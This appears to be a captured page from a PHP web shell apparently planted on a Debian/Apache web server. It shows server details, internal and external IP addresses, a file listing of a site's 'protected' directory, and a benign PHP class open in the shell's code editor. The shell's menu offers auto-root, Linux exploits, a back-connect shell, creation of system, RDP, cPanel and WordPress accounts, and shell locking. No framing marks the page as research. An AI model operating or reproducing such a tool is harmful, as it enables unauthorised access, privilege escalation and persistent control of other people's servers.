Linux polon 4.19.0-27-amd64 #1 SMP Debian 4.19.316-1 (2024-06-25) x86_64
Apache/2.4.59 (Debian)
: 10.2.73.233 | : 3.129.42.59
Cant Read [ /etc/named.conf ]
5.6.40-64+0~20230107.71+debian10~1.gbp673146
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
ifk /
web.back /
v2021 /
protected /
Common /
[ HOME SHELL ]
Name
Size
Permission
Action
assets
[ DIR ]
drwxr-xr-x
KAdminPage.php
346
B
-rw-r--r--
KApplication.php
313
B
-rw-r--r--
KAuthor.php
1.3
KB
-rw-r--r--
KBooleanColumn.php
1.57
KB
-rw-r--r--
KClass.php
1.85
KB
-rw-r--r--
KClassGiver.php
1.04
KB
-rw-r--r--
KClassMaterialFile.php
2.81
KB
-rw-r--r--
KContentItem.php
3.3
KB
-rw-r--r--
KDuty.php
2.82
KB
-rw-r--r--
KImage.php
7.01
KB
-rw-r--r--
KImageManager.php
1.73
KB
-rw-r--r--
KNewsItem.php
4.27
KB
-rw-r--r--
KPage.php
1.96
KB
-rw-r--r--
KPaper.php
13.62
KB
-rw-r--r--
KRightBox.php
2.82
KB
-rw-r--r--
KScheduleEntry.php
3.67
KB
-rw-r--r--
KUser.php
1.55
KB
-rw-r--r--
KUserRecord.php
10.81
KB
-rw-r--r--
PEmailer.php
445
B
-rw-r--r--
PErrorHandler.php
4.3
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : KRightBox.php
<?php class KRightBox extends TActiveRecord { private $_id; private $_image_id; private $_title; private $_content; private $_content_item_id; private $_url; private $_sort_pos; private $_image; const TABLE = 'ifk_rightboxes'; /** * @return mixed */ public function getId() { return $this->_id; } /** * @param mixed $id */ public function setId($id) { $this->_id = $id; } /** * @return mixed */ public function getImage_Id() { return $this->_image instanceof KImage ? $this->_image->getId() : $this->_image_id; } /** * @param mixed $image_id */ public function setImage_Id($image_id) { $this->_image_id = $image_id; } /** * @return mixed */ public function getTitle() { return $this->_title; } /** * @param mixed $title */ public function setTitle($title) { $this->_title = $title; } /** * @return mixed */ public function getContent() { return $this->_content; } /** * @param mixed $content */ public function setContent($content) { $this->_content = $content; } /** * @return mixed */ public function getContent_item_id() { return $this->_content_item_id; } /** * @param mixed $content_item_id */ public function setContent_item_id($content_item_id) { $this->_content_item_id = $content_item_id; } /** * @return mixed */ public function getSort_pos() { return $this->_sort_pos; } /** * @param mixed $sort_pos */ public function setSort_pos($sort_pos) { $this->_sort_pos = $sort_pos; } /** * @return mixed */ public function getUrl() { return $this->_url; } /** * @param mixed $url */ public function setUrl($url) { $this->_url = $url; } public function getImage() { if (!($this->_image instanceof KImage) && is_null($this->_image_id)) { $this->_image = new KImage; } elseif (!($this->_image instanceof KImage)) { $this->_image = new KImage; $this->_image->load($this->_image_id); } return $this->_image; } public function deleteImage() { if ($this->Image instanceof KImage) { $this->_image_id = null; $this->save(); $this->Image->delete(); } } public function delete() { $this->deleteImage(); parent::delete(); } public function save() { parent::save(); } public static function finder($className = __CLASS__) { return parent::finder($className); } } ?>
Close